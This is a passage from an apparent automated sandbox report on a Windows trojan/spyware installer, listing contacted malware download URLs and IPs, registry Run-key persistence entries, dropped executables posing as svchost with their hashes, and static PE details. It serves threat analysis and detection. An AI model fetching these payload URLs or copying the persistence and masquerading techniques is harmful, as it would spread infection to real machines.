http://www.wk1888.com/	server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://www.af0575.com:2011/1.exee3	svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://www.af0575.com:2011/1.exe~l	server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGY	.exe, 00000005.00000002.2705462292.000000000234B000.00000004.00000020.00020000.00000000.sdmp	false	high
http://192.168.2.1	v5.exe, 00000004.00000002.2594829199.0000000000678000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://192.168.2.1:80/_	v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://192.168.2.1:80/6to4	v5.exe, 00000004.00000003.1561640538.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494703239.00000000006A5000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://192.168.2.1/1	v5.exe, 00000004.00000003.1494703239.00000000006B3000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://www.af0575.com:2011/1.exee	svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://deff.nelreports.net/api/report?cat=msn	.exe, 00000005.00000002.2705462292.000000000234B000.00000004.00000020.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	G3izWAY3Fa.exe	false	high
http://www.af0575.com:2011/1.exeb	svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://www.fz0575.com:2011/1.exew	server.exe, 00000003.00000002.2683900710.0000000000708000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://192.168.2.1:80/	v5.exe, 00000004.00000003.2013456576.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://nsis.sf.net/NSIS_Error	G3izWAY3Fa.exe	false	high
http://192.168.2.1/VZ	v5.exe, 00000004.00000003.2237287822.0000000000690000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2013456576.0000000000691000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://192.168.2.1/h	v5.exe, 00000004.00000002.2594829199.0000000000678000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://www.fz0575.com:2011/1.exer	svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://192.168.2.1/	v5.exe, 00000004.00000003.2558799404.0000000000690000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006B3000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://www.wk1888.com:2011/1.exe	svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://www.fz0575.com:2011/1.exe-	server.exe, 00000003.00000002.2683900710.000000000067D000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://www.fz0575.com:2011/1.exelo~	server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://www.af0575.com:2011/1.exejlt	server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://192.168.2.1:80/~	v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://www.wk1888.com:2011/1.exetlV	server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://192.168.2.1/b6	v5.exe, 00000004.00000003.1494703239.00000000006A5000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://www.fz0575.com:2011/1.exeNoP	server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://192.168.2.1:80/4	v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://www.fz0575.com:2011/1.exepoj	server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
120.48.34.233	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	true
8.7.198.46	chinagov.8800.org	United States	14567	SPRINGSUS	true
46.82.174.69	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	true

Private

IP
192.168.2.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1579781
Start date and time:	2024-12-23 09:00:36 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	81
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	G3izWAY3Fa.exe renamed because original name is a hash value
Original Sample Name:	118F7F61B6AFB1DA5E94EA1740222C73.exe
Detection:	MAL
Classification:	mal84.spre.bank.troj.spyw.evad.winEXE@113/11@12/4
EGA Information:	Successful, ratio: 83.3%
HCA Information:	Successful, ratio: 99% Number of executed functions: 166 Number of non-executed functions: 224
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:01:25	API Interceptor	1284x Sleep call for process: server.exe modified
03:01:27	API Interceptor	326x Sleep call for process: v5.exe modified
03:01:31	API Interceptor	1615x Sleep call for process: svchost.exe modified
03:01:51	API Interceptor	1x Sleep call for process: .exe modified
08:01:29	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run XXXXXX05CA35CC C:\Windows\XXXXXX05CA35CC\svchsot.exe
08:01:38	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run XXXXXX579E5A5B VVVVVVrr2unw== C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SPRINGSUS	nshppc.elf	Get hash	malicious	Mirai	Browse	166.126.15.148
	nshkmips.elf	Get hash	malicious	Mirai	Browse	113.29.21.198
	la.bot.powerpc.elf	Get hash	malicious	Mirai	Browse	192.30.164.221
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	128.198.240.171
	mpsl.elf	Get hash	malicious	Unknown	Browse	166.126.117.121
	jew.m68k.elf	Get hash	malicious	Unknown	Browse	166.126.15.112
	la.bot.sparc.elf	Get hash	malicious	Unknown	Browse	166.126.15.153
	8DKuAcmAMT.elf	Get hash	malicious	Unknown	Browse	166.126.240.187
	la.bot.arm5.elf	Get hash	malicious	Unknown	Browse	166.126.134.153
	na.elf	Get hash	malicious	Mirai	Browse	166.126.15.153
DTAGInternetserviceprovideroperationsDE	armv6l.elf	Get hash	malicious	Unknown	Browse	79.193.89.169
	armv4l.elf	Get hash	malicious	Unknown	Browse	93.218.244.191
	loligang.arm.elf	Get hash	malicious	Mirai	Browse	79.214.151.97
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	37.94.30.242
	loligang.arm7.elf	Get hash	malicious	Mirai	Browse	79.206.150.140
	loligang.ppc.elf	Get hash	malicious	Mirai	Browse	93.202.104.37
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	91.60.133.243
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	37.86.102.231
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	217.234.140.150
	sparc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	84.188.60.136
CHINANET-BACKBONENo31Jin-rongStreetCN	armv6l.elf	Get hash	malicious	Unknown	Browse	61.146.165.65
	armv4l.elf	Get hash	malicious	Unknown	Browse	14.118.130.115
	2.elf	Get hash	malicious	Unknown	Browse	59.175.154.153
	3.elf	Get hash	malicious	Unknown	Browse	36.45.84.63
	loligang.sh4.elf	Get hash	malicious	Mirai	Browse	123.163.227.84
	loligang.arm.elf	Get hash	malicious	Mirai	Browse	111.226.186.147
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	27.146.124.78
	loligang.arm7.elf	Get hash	malicious	Mirai	Browse	111.182.110.21
	loligang.ppc.elf	Get hash	malicious	Mirai	Browse	119.120.60.137
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	218.70.92.243

Process:	C:\Windows\Temp\server.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	7.590445953703057
Encrypted:	false
SSDEEP:	3072:rDZrrTt3fP9ZGFwgvRLLCzOYFDq+UdnIPPlMzcsofIw+KaX0LcHLkMIIRRg:fph96wgvRHCzOYtqlGyzcsX3KA0LQIQY
MD5:	00C090DAE3EE360E575655FE89121D83
SHA1:	7E12E9268476B23B78E2953353DF38823DB0BD17
SHA-256:	BD6D059B8F8C15C71553D77E99453265CE87C43793D6330C3B80C05CD704A8AD
SHA-512:	9447F0F55AB28C6C184E721648DD525E500749A869756C5CE1F49CADE82AF984AB0AF9FBDB215F45E2BC4DC66E2ADD023FB36048C883814CF2FAD7D7EBF54154
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1 ..uA..uA..uA...]..tA..Cg..tA...]..xA..Cg..iA...N..pA..uA..[A...^..tA...^..tA...G..tA..RichuA..........PE..L...r..N.................P..........9........`....@.........................................................................Td..<....................................................................................`...............................text....D.......P.................. ..`.rdata..\|....`.......`..............@..@.data........p.......p..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\033726\svchost.exe

Download File

Process:	C:\Windows\Temp\server.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	7.5898551091068285
Encrypted:	false
SSDEEP:	3072:rDZrrTt3fP9ZGFwgvRLLCzOYFDq+UdnIPPlMzcsofIw+KaX0LcHLkMIIRRp:fph96wgvRHCzOYtqlGyzcsX3KA0LQIQh
MD5:	8A953A49796B7F8C7539A6B2BC175397
SHA1:	5E4B317DD08B080EDCF127FF6E5F86F0108372BE
SHA-256:	ABC198E7B27D864DED945C2053C781E59CD5294BEE301D7D2B931A1F0D4087A7
SHA-512:	5CE1705F04E29267EC6BDF8D6D2309D5DBE05CD2C0D70A4D8DBC5FDF7060F53092A8254369CB9F20952A43F09B06C11D455003B4ACAEE6F536ECBAFF9929F118
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 95%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1 ..uA..uA..uA...]..tA..Cg..tA...]..xA..Cg..iA...N..pA..uA..[A...^..tA...^..tA...G..tA..RichuA..........PE..L...r..N.................P..........9........`....@.........................................................................Td..<....................................................................................`...............................text....D.......P.................. ..`.rdata..\|....`.......`..............@..@.data........p.......p..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\034031\RCX8B31.tmp

Download File

Process:	C:\Windows\SysWOW64\033726\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	7.5904450128761045
Encrypted:	false
SSDEEP:	3072:rDZrrTt3fP9ZGFwgvRLLCzOYFDq+UdnIPPlMzcsofIw+KaX0LcHLkMIIRRq:fph96wgvRHCzOYtqlGyzcsX3KA0LQIQy
MD5:	B573CCA4145727C22E1AD6774DBF3705
SHA1:	E03C46743B3F3FAE25CF03429782B27C97AAA8F2
SHA-256:	C76750E8A32C78D3883EF1B16666672E06CC44F2A2BAB783B8D4501AD5EF8CF2
SHA-512:	BA94B9DE1811D57782F8CB0CF3E346AE41BC5E1152BF88C47EC4D42E6E0257271B00C9539807C4D7C1693152DD167D3C80E9BBD89AA012B4EB3A593DF7C56867
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1 ..uA..uA..uA...]..tA..Cg..tA...]..xA..Cg..iA...N..pA..uA..[A...^..tA...^..tA...G..tA..RichuA..........PE..L...r..N.................P..........9........`....@.........................................................................Td..<....................................................................................`...............................text....D.......P.................. ..`.rdata..\|....`.......`..............@..@.data........p.......p..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\034031\svchost.exe

Download File

Process:	C:\Windows\SysWOW64\033726\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	7.590445953703057
Encrypted:	false
SSDEEP:	3072:rDZrrTt3fP9ZGFwgvRLLCzOYFDq+UdnIPPlMzcsofIw+KaX0LcHLkMIIRRg:fph96wgvRHCzOYtqlGyzcsX3KA0LQIQY
MD5:	00C090DAE3EE360E575655FE89121D83
SHA1:	7E12E9268476B23B78E2953353DF38823DB0BD17
SHA-256:	BD6D059B8F8C15C71553D77E99453265CE87C43793D6330C3B80C05CD704A8AD
SHA-512:	9447F0F55AB28C6C184E721648DD525E500749A869756C5CE1F49CADE82AF984AB0AF9FBDB215F45E2BC4DC66E2ADD023FB36048C883814CF2FAD7D7EBF54154
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1 ..uA..uA..uA...]..tA..Cg..tA...]..xA..Cg..iA...N..pA..uA..[A...^..tA...^..tA...G..tA..RichuA..........PE..L...r..N.................P..........9........`....@.........................................................................Td..<....................................................................................`...............................text....D.......P.................. ..`.rdata..\|....`.......`..............@..@.data........p.......p..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\05CA35CC

Download File

Process:	C:\Windows\Temp\server.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	7
Entropy (8bit):	2.8073549220576046
Encrypted:	false
SSDEEP:	3:qR:qR
MD5:	7A1920D61156ABC05A60135AEFE8BC67
SHA1:	808D7DCA8A74D84AF27A2D6602C3D786DE45FE1E
SHA-256:	21B111CBFE6E8FCA2D181C43F53AD548B22E38ACA955B9824706A504B0A07A2D
SHA-512:	94ABFC7B11F4311E8E279B580907FEFC1118690479FB7E13F0C22ADE816BC2B63346498833B0241EEC2B09E15172E13027DC85024BACB7BC40C150F4131F7292
Malicious:	false
Preview:	Default

C:\Windows\Temp\ .exe

Download File

Process:	C:\Users\user\Desktop\G3izWAY3Fa.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1429612
Entropy (8bit):	6.009627235349156
Encrypted:	false
SSDEEP:	24576:GvbBARGCfE5TVUUCql3jpomr6RTmBfOKpf37Q+zAV9/NaCWxI7IPBRiAY:WARGEvqlzpomr6RTmBfOKpf37Q+zAV92
MD5:	CCEE0912E79D434F0D2C1E11274F23C0
SHA1:	9A34CD426601ACE88DCB91B3820DC98EBE29ED96
SHA-256:	679B9AF0DEF4DBBE2E179AC05F9A7AB4C2FFC28A71964A9E9EDF2986BDC1B1A2
SHA-512:	B87212CC683F2DF362E11F1B509D29B482A9560E04E562E580BD58755F6FE25C0BBF4CB525E793F205656F16AD32C7B909FC53E9C137E8A5F4415BAA5FF0977E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>..._.._.._.@W..._.9\|.._..\|.._..W..._.@W..._.._..]..S.._..S..a_..S..H_./T..._..S..._.Rich._.................PE..L......H.................@...................P....@.............................................................................@........B..........................PV..............................`...H............P..L.......@....................text...~>.......@.................. ..`.rdata.......P.......P..............@..@.data...t\...P...0...P..............@....rsrc....B.......P..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\server.exe

Download File

Process:	C:\Users\user\Desktop\G3izWAY3Fa.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	7.5898551091068285
Encrypted:	false
SSDEEP:	3072:rDZrrTt3fP9ZGFwgvRLLCzOYFDq+UdnIPPlMzcsofIw+KaX0LcHLkMIIRRp:fph96wgvRHCzOYtqlGyzcsX3KA0LQIQh
MD5:	8A953A49796B7F8C7539A6B2BC175397
SHA1:	5E4B317DD08B080EDCF127FF6E5F86F0108372BE
SHA-256:	ABC198E7B27D864DED945C2053C781E59CD5294BEE301D7D2B931A1F0D4087A7
SHA-512:	5CE1705F04E29267EC6BDF8D6D2309D5DBE05CD2C0D70A4D8DBC5FDF7060F53092A8254369CB9F20952A43F09B06C11D455003B4ACAEE6F536ECBAFF9929F118
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 95%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1 ..uA..uA..uA...]..tA..Cg..tA...]..xA..Cg..iA...N..pA..uA..[A...^..tA...^..tA...G..tA..RichuA..........PE..L...r..N.................P..........9........`....@.........................................................................Td..<....................................................................................`...............................text....D.......P.................. ..`.rdata..\|....`.......`..............@..@.data........p.......p..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\v5.exe

Download File

Process:	C:\Users\user\Desktop\G3izWAY3Fa.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	16896
Entropy (8bit):	7.562483931351241
Encrypted:	false
SSDEEP:	384:PWxP8NYOCgS7+h4vIpWEXSPTNy2ineaLM1ies89sxLrG:uaiOCz6n4EXS7rirVer9sNr
MD5:	48A02F4A003E8CBE683CF5DADA237168
SHA1:	2A81C0962ADEEF89CE33DE746ADFD455C652D216
SHA-256:	11933D11631C99743C3F457B30D5EBB72399BF52D53B51E9CD21E17B1CA1DFB0
SHA-512:	A372B54806840A1D6DDAAFDCB7D5D1218A086DED2FE51C70C89034BA6CB9D644AC914AF998A4E4F614E0C990A864059A8618B1EDD28D39CC96C6FC74D9631F12
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........1...b...b...b...b...b>..b...b...b...b...b...b~.b...b...b...bU..b...bz..b...bRich...b........................PE..L....>nU.................@........................@.................................................................................................................................................................................................UPX0....................................UPX1.....@.......:..................@...UPX2.................>..............@..............................................................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

C:\Windows\XXXXXX05CA35CC\svchsot.exe

Download File

Process:	C:\Windows\Temp\server.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	7.5898551091068285
Encrypted:	false
SSDEEP:	3072:rDZrrTt3fP9ZGFwgvRLLCzOYFDq+UdnIPPlMzcsofIw+KaX0LcHLkMIIRRp:fph96wgvRHCzOYtqlGyzcsX3KA0LQIQh
MD5:	8A953A49796B7F8C7539A6B2BC175397
SHA1:	5E4B317DD08B080EDCF127FF6E5F86F0108372BE
SHA-256:	ABC198E7B27D864DED945C2053C781E59CD5294BEE301D7D2B931A1F0D4087A7
SHA-512:	5CE1705F04E29267EC6BDF8D6D2309D5DBE05CD2C0D70A4D8DBC5FDF7060F53092A8254369CB9F20952A43F09B06C11D455003B4ACAEE6F536ECBAFF9929F118
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 95%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1 ..uA..uA..uA...]..tA..Cg..tA...]..xA..Cg..iA...N..pA..uA..[A...^..tA...^..tA...G..tA..RichuA..........PE..L...r..N.................P..........9........`....@.........................................................................Td..<....................................................................................`...............................text....D.......P.................. ..`.rdata..\|....`.......`..............@..@.data........p.......p..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe

Download File

Process:	C:\Windows\SysWOW64\033726\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	7.590445953703057
Encrypted:	false
SSDEEP:	3072:rDZrrTt3fP9ZGFwgvRLLCzOYFDq+UdnIPPlMzcsofIw+KaX0LcHLkMIIRRg:fph96wgvRHCzOYtqlGyzcsX3KA0LQIQY
MD5:	00C090DAE3EE360E575655FE89121D83
SHA1:	7E12E9268476B23B78E2953353DF38823DB0BD17
SHA-256:	BD6D059B8F8C15C71553D77E99453265CE87C43793D6330C3B80C05CD704A8AD
SHA-512:	9447F0F55AB28C6C184E721648DD525E500749A869756C5CE1F49CADE82AF984AB0AF9FBDB215F45E2BC4DC66E2ADD023FB36048C883814CF2FAD7D7EBF54154
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1 ..uA..uA..uA...]..tA..Cg..tA...]..xA..Cg..iA...N..pA..uA..[A...^..tA...^..tA...G..tA..RichuA..........PE..L...r..N.................P..........9........`....@.........................................................................Td..<....................................................................................`...............................text....D.......P.................. ..`.rdata..\|....`.......`..............@..@.data........p.......p..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.188721875540868
Encrypted:	false
SSDEEP:	3:oCfe49:oCfD
MD5:	6B2C41D2A2AF44EFB642F9C3DBCA6668
SHA1:	5D98044E6220AD035474C209EF75CB8F37C6965C
SHA-256:	623F011819A1BD73F84EE6593735C89462E596A4AD0B730B0F650A486D63E4C8
SHA-512:	8C419F40477E11A315F30F79F61EFC17178B2C851276F4FD35175032073296787610DB29DA9C99A8B97551F22B01625A2F19CAFF6CD25B6F5E691AD56C3822E9
Malicious:	false
Preview:	C:\Windows\temp\v5.exe..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	6.913255582101916
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	G3izWAY3Fa.exe
File size:	963'286 bytes
MD5:	118f7f61b6afb1da5e94ea1740222c73
SHA1:	5a0d66ec18cdb3812bad259999cf64d051cefa8b
SHA256:	aaf88339c23080ffd423da3b03a229d220b55c5e007c1f413fbd3633c48aad44
SHA512:	a98dc6940d0a3026075b77d406f5481a0071c1c6465027f3da13716932e0fd6bd06c73a48aa068ba2206210b7f9ab057232323c548f090d71baa5d4ba128e791
SSDEEP:	12288:YIrxBdnioD+GL4DY6TMMQ77iOF8X8WBBXnBZwECeLqq3RCmK9JI25q5iedndTIQe:PBRiEUDpZQ1abzwEJLfRWzIiednd518
TLSH:	F425F04E65955B82C8F40D34837AB22E41246D1B49F4A7F5B4A9FF0EF93CC89CD36A21
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z.........

File Icon


Icon Hash:	2e6343696c6b572e

Static PE Info

General

Entrypoint:	0x4030cb
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4B1AE3C1 [Sat Dec 5 22:50:41 2009 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	7fa974366048f9c551ef45714595665e

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409160h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push 00008001h
call dword ptr [004070B0h]
push ebx
call dword ptr [0040727Ch]
push 00000008h
mov dword ptr [00423F38h], eax
call 00007F2080B44A16h
mov dword ptr [00423E84h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 0041F430h
call dword ptr [00407158h]
push 00409154h
push 00423680h
call 00007F2080B446C9h
call dword ptr [004070ACh]
mov edi, 00429000h
push eax
push edi
call 00007F2080B446B7h
push ebx
call dword ptr [0040710Ch]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [00423E80h], eax
mov eax, edi
jne 00007F2080B41E2Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
push dword ptr [esp+14h]
push eax
call 00007F2080B441AAh
push eax
call dword ptr [0040721Ch]
mov dword ptr [esp+1Ch], eax
jmp 00007F2080B41E85h
cmp cl, 00000020h
jne 00007F2080B41E28h
inc eax
cmp byte ptr [eax], 00000020h
je 00007F2080B41E1Ch
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73a4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x57180	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x28c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x58d2	0x5a00	c69726ed422d3dcfdec9731986daa752	False	0.665234375	data	6.4331003482809646	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1190	0x1200	a2c7710fa66fcbb43c7ef0ab9eea5e9a	False	0.4453125	data	5.179763757809345	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
